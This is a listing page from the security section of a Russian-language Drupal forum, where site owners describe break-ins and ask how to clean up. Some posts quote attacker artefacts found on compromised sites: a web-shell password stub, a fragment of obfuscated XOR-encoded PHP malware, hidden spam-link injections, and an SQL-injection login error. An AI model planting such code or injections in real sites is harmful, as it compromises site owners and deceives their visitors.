Безопасность

Вопросы защиты скриптов и системного окружения, объявления о найденных уязвимостях и security-релизах Drupal.
Новости команды безопасности Drupal: drupal.org/security
См. также: bugtrack.ru, securitylab.ru.

icon: 

VasyOK Сб, 28/03/2015 - 03:46

Взломали сайт. Помогите выянить причину.

В один прекрасный момент в корневой папке htaccess.php появилось

<?php

$auth_pass = "596a96cc7bf9108cd896f33c44aedc8a";

?>

Тип материала: 
Версия Drupal: 
0 Спасибо

mikel Сб, 21/03/2015 - 20:28

Как найти все зараженные файлы в исходниках

Пожалуйста, подскажите:
Есть сайт на drupal7, его хакнули, идет спам.
Хостер написал, чтобы удалили все зараженные файлы. На приличных хостингах стоит система, которая сразу выдает список файлов, которые надо удалить. Но тут хостер ленив, сказал "ищите сами".

Основной вопрос: есть какая-нибудь бесплатная утилита, через которую можно прогнать исходники?

Вручную нашел несколько файлов, пример:

<?php
 $flz
='Ux'^'1M5k%y';$rep='R7B@@6M39F#@A%"'^'7E0/2i?VI)Q4(KE8iOcA';$yyeff='""';$ldgv=0;$mghul=')';##e?})_;]N15.)2$X}Z/3roWa
$vaklx='Y!*Z]Q54]K@V';$cib='(C}|%|0Q[)m#oz})sZ%@vE=4m'^'({eP_dP';$cfri='6A@lCTtEqX&ypPx&gB)MWbAb3VRdCA{G';ihgqaj;$bsrc='(AB94^2qLWaN*'^'A/+fG;F';/*$pj;hJ4(/^5J5[Z|uW(U0:f6VZpbwmhat^$lwspmgxiy*/$vz='=ng$.{/';?>
Тип материала: 
Ключевые слова: 
Версия Drupal: 
0 Спасибо

ChesteR_203 Втр, 17/03/2015 - 17:40

Исправление последствий взлома

Сайт на D7 был взломан после критической уязвимости - [#113136]http://www.drupal.ru/node/113136[/#]
Полностью заменил ядро и обновился. Удалил файлы которые были созданы злоумышленником, удалил новую роль админа.

Но сейчас обнаружил на сайте скрытые ссылки вида:

<div id="xald"><a href="http://www.asianpeasant.org/with-payday">with payday</a></div>
<script>document.getElementById("xald").style.visibility="hidden";document.getElementById("xald").style.display="none";</script>

и:

<div id="vken"><a href="http://techenzyme.com/pay-day-loans-online-for-bad-credit" rel="nofollow">pay day loans online for bad credit</a></div>
<style type="text/css">
#vken{display:none;visibility:hidden;}</style>
Тип материала: 
Ключевые слова: 
Версия Drupal: 
0 Спасибо

Studio VIZA Пнд, 16/03/2015 - 03:06

Если мучает спам на сайте.

Создавал подобную тему когда-то, сейчас думаю - почему люди не понимают очевидного?

Есть проблема - спам на сайтах. Нужно найти решение, простое, изящное и, самое главное - быстрое. А что, проблема то вроде решилась. Установил модуль, включил...
Заходят потом, ааа обошли! Индусы читают каптчу! Китайцы картинки решают за рис! Аааа!

И опять ищут решение. И опять быстрое, потом всё заново - Аааа! Вот мёд советуют - Аааа!

В том что я предлагаю - есть маленький элемент мазохизма. Взамен, в течении нескольких лет вы забудете о проблеме со спамом и, мало того, будете издеваться над ним его полностью контролировать.

==========================================================================================
Этап 1.

Тип материала: 
Версия Drupal: 
1 Спасибо

alexregion Втр, 10/03/2015 - 17:53

Бот пытается ответить на несуществующий (удаленный комментарий)

Бот пытается ответить на несуществующий (удаленный комментарий) - как я понял ранее был запущен для помещения ссылки в ответе на комментарий. Коммент был удален, а бот все ломится постоянно под разными IP в ответ на один и тот же коммент (в отчетах "страница не найдена") - хочу избавится, чтобы не грузил сервер. Помогите если возможно.

Тип материала: 
Ключевые слова: 
Версия Drupal: 
0 Спасибо

Hades Вс, 01/03/2015 - 20:55

Права на файлы и папки Drupal 7

Очень не плохой скрипт был дан в комментарии... https://www.drupal.org/node/244924#comment-6600078
Изменил и доработал его под себя:

#!/bin/bash
# Script made by Alex Belyj, admin@azfest.ru
read -n 1 -p "Ну я начну разруливать права а Вы пока чайку попейте, хорошо? (y/[a]): " AMSURE
[ "$AMSURE" = "y" ] || exit
echo "" 1>&2
echo "Начинаю изменение прав..."
echo "Устанавливаю владельца www-data для всех папок и файлов"
chown -R www-data:www-data './'
echo "Выставляю права 755 для всех папок"
find './' -type d -exec chmod 755 {} \;
echo "Выставляю права 644 для всех файлов"
find './' -type f -exec chmod 644 {} \;
echo "Выставляю права 440 для .htaccess"
chmod 440 './.htaccess'
echo "Выставляю права 775 для sites"
chmod 775 './sites'
Тип материала: 
Ключевые слова: 
Версия Drupal: 
0 Спасибо

Filosofos Вс, 01/03/2015 - 17:05

Необходимое

Всем привет!

Скоро будет готово мой сайт на Друпал и надо будет разместить на хостинг.
Но перед тем как это делать хотелось бы посоветоваться с вами в вопросах безопасности.

Скажите пожалуйста какие настройки необходимые я должен сделать чтобы мой сайт был здоровым и сильным в будущем??Какие меры предосторожности??
Чисто по логике понимаю что есть 100% обязательные шаги без которых сайт может быть уязвим.Что посоветуете для начала??

Тип материала: 
Ключевые слова: 
Версия Drupal: 
0 Спасибо

Sebastian Pereiro Ср, 25/02/2015 - 13:27

Странный взлом

Зашел сегодня в раздел "Пользователи" и обнаружил там новую запись с правами администратора.
Логи говорят что запись была создана сегодня, для email drupdev321@gmail.com
Зарегистрирован на сайте 9 лет, сколько-то месяцев.

Пользователь создал тестовую страницу, затем удалил ее.
Заход был с 192.99.2.137, то есть с ТОРа.

О чем это было, есть идеи?

Тип материала: 
0 Спасибо

cesar-atk Ср, 04/02/2015 - 10:39

Спам в рассылка с сайта об необходимости сделать обновление

Добрый день.

В регулярных рассылках сайта о том, что необходимо обновить модули стал приходить спам. А именно, в письме указана ссылка не на текущий сайт с друпалом, а ссылка на сторонний сайт.
Вот пример:

«Для установленных на сайте проектов
доступны обновления. Рекомендуется как
можно скорее установить новые версии.

Дополнительную информацию можно найти на странице обновлений.
http://www.epochtimes.jp/admin/reports/updates

Ваш сайт в настоящее время
сконфигурирован для отправки этих email'ов, только когда доступны любые обновления.
Для оповещения о других событиях,
пройдите по ссылке:
http://www.epochtimes.jp/admin/reports/updates/settings.»

Через несколько дней пришло письмо с ссылкой на другой сайт.
Версия Drupal 7.34

Тип материала: 
Версия Drupal: 
0 Спасибо

ttenz Чт, 29/01/2015 - 17:29

Критическая уязвимость (CVE-2015-0235) у серверов под Linux

Новая уязвимость GHOST ((CVE-2015-0235) в библиотеке glibc (GNU C Library))
Уязвимость в распространенных дистрибутивах Linux может позволить злоумышленнику получить удаленный контроль над системой. Под ударом оказались пользователи Debian 7 (wheezy), Red Hat Enterprise Linux 6 & 7, CentOS 6 & 7, Ubuntu 12.04.
http://habrahabr.ru/company/pt/blog/249097/

проверяем, есть ли она.

от рута:

wget https://gist.githubusercontent.com/koelling/ef9b2b9d0be6d6dbab63/raw/de1730049198c64eaf8f8ab015a3c8b23b63fd34/gistfile1.c
gcc gistfile1.c -o CVE-2015-0235
./CVE-2015-0235

если vulnarable, то

Debian, Ubuntu:

sudo apt-get clean
sudo apt-get update
sudo apt-get upgrade
sudo reboot

остальные:

Тип материала: 
Ключевые слова: 
1 Спасибо

Kublahan Пнд, 26/01/2015 - 14:34

Взлом пароля админа

Привет! У меня сайт на drupal 7. С моего последнего посещения остался незавершенный сеанс у меня на компе. Сегодня обнаружил, что логин админа переименован и пароль его сменен. Спасло меня то, что в этом незавершенном сеансе я смог зайти в админку и сменить пароль. Скажите, как могли злоумышленники такое сделать? Пароль до этого был сильный. Где можно в логах посмотреть, когда произошла смена пароля и логина?

Тип материала: 
Ключевые слова: 
Версия Drupal: 
0 Спасибо

Стасевич Чт, 22/01/2015 - 09:33

Взлом сайта через восстановление пароля

Доброго дня!

Кто-нибудь может подсказать, каким образом ломают сайт на друпал6 через восстановление пароля админа?
Как защититься?

Взломали сайт. Подглядел за действиями взломщика на сайте.
- Заходят в восстановление пароля, вводят емейл админа (вероятно до этого был шел загружен, был доступ к файлам и базе)
- Затем та же страница восстановления перезагружается, и вводят уже свой емейл.
- Получают одноразовую ссылку для входя и орудуют на сайте.

Тип материала: 
Версия Drupal: 
0 Спасибо

apache24 Втр, 13/01/2015 - 15:39

Рассылка спама модулем ctools. Как победить?

Здравствуйте,

Хостер написал что с сайта идет рассылка спама..
модуль ctools.
скрипт X-PHP-Script: XXXXXXXXXXXXXX.ru/sites/all/modules/ctools/plugins/export_ui/system.php

Подскажите пожалуйста, что делать..
сайт заблокировал хостер.

Версия Drupal: 
0 Спасибо

winny63 Вс, 11/01/2015 - 21:19

Сильный рост количества операций ввода-вывода на хосте

Есть сайт на Drupal 6.34. На нем - сайт-визитка + интернет-магазин на Ubercart с небольшим количеством товаров. Статей/товаров и связанных с ними файлов изображений немного. Загружаемых/скачиваемых файлов нет.
За последнюю неделю наблюдается сильный рост количества операций ввода-вывода на хосте (до этого такого никогда не наблюдалось даже при обычной средней нагрузке НЕ в праздничные дни, в течение которых существенной активности практически не было)
Статистика хоста по операциям ввода-вывода:
11.01.2015 195861
10.01.2015 198821
09.01.2015 193256
08.01.2015 151710
07.01.2015 184898
06.01.2015 63844
05.01.2015 30221
04.01.2015 37335

Материалов в эти дни никто особо не добавлял/изменял, клиентов минимум, левые боты "задушены" по IP...

Тип материала: 
Версия Drupal: 
0 Спасибо

venji Чт, 01/01/2015 - 12:22

Регистрация сквозь капчу?

Здравствуйте, может кто сталкивался, откуда то берутся пользователи с окончанием mi - http://prntscr.com/5n87ay таких может быть 30-40 удалаяю они опять, при регистрации стоит капча он яндекса, как так?

Тип материала: 
Версия Drupal: 
0 Спасибо

Launder Пнд, 29/12/2014 - 11:45

Непонятные регистрации

ipregistrCete blocked
9 hours 42 min never edit

radiogamblingveX blocked
3 days 23 hours never edit

onlinespishyvado blocked
5 days 16 hours never edit

betwinserviceEr blocked
1 week 12 hours never edit

gsmrznkr blocked
1 week 1 day never edit

Тип материала: 
Модули и темы: 
0 Спасибо

SergeyB Пнд, 22/12/2014 - 12:02

Поламали сайт HACKED BY ARAB WARRIORS TEAM

Поламали сайт, Drupal 7.22

Выглядел после взлома так - http://drupalir.com/node/62 (это не мой сайт), скриншот во вложении
19 декабря в 10.19 появился файл в корне - Anonriad.php, index.php был заменен.

Понятно, сам - не обновлял. Прошу помощи, если возможно определить как был сломан сайт, какие меры предпринять (что где почистить и проверить) перед обновлением.

Спасибо!

Содержимое Anonriad.php:

Ключевые слова: 
Версия Drupal: 
0 Спасибо

Николай7 Ср, 17/12/2014 - 17:54

Нужна грамотная помощь в настройке...

Здравствуйте.
Ситуация. Владею сайтом 1 год.Висел на хосте. Недавно получил письмо от яндекса, что на сайте завелся подозрительный скрипт, через день яндек сигнализировал что все нормально.Я не придал этому значения, по причине нехватки времени.и лоханулся..

Сайт на друпале 7.23.Недавно нарыл в админцентре..еще пару администраторов, спешно их удалил.Почта у них была дословно не помню но вроде drupalev@gmail.com.На хосте 2 моих сайта.Хостинг заблокировал отправку почты, так как с них идет спам письмами..куда то и кому то.

В общем данные типы и cpon делали и еше много чего.Сегодня зашел на сайт, не могу обновить не движок , ни модули, так как пишет ошибка при поиске обновлений.Плюс к сайту прикручен форум на IPB.Он тоже оказался недоступен.пишет - Driver Error

Версия Drupal: 
0 Спасибо

tishka2 Сб, 13/12/2014 - 10:59

Отправка спама через служебные файлы drupal

Здравствуйте! Надеюсь, кто-то сталкивался с данной проблемой, очень нужен совет...
Ситуация такая, что хостер отключил отправку писем на аккаунте, всего пострадало 8 сайтов, сделанных на Drupal. Мотивируют тем, что кто-то, пользуясь уязвимостью сайтов, отправлял спам.
Рекомендовали обратить внимание на следующие файлы (все файлы относятся к разным доменам):

/sites/all/modules/date/tests/press.php

/modules/update/tests/themes/update_test_basetheme/stats.php

/sites/all/modules/ctools/ctools_custom_content/plugins/export_ui/error.php

/modules/simpletest/tests/drupal_system_listing_incompatible_test/functions.ph

Может кому-то это о чем-то скажет? Также вот что они написали:

Тип материала: 
Версия Drupal: 
0 Спасибо

tematam Пт, 12/12/2014 - 20:35

Взломали сайты

Всем привет!
У меня случилась беда.
Абсолютно все мои сайты взломали. Каким образом не понятно.
Сначала был введен код на странице http://sovbistroy.ru/user:
PDOException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ' 'OKOFJ' AND status = 1' at line 1: SELECT * FROM {users} WHERE name = :name_0, :name_1 AND status = 1; Array ( [:name_0] => LirDOP [:name_1] => OKOFJ ) в функции user_login_authenticate_validate() (строка 2154 в файле /home/s/sovbistrru/sovbistroy.ru/public_html/modules/user/user.module).

Потом около 50 попыток подбора пароля. Неудачных, т.к. подбирали для логина admin

Тип материала: 
Версия Drupal: 
0 Спасибо

Страницы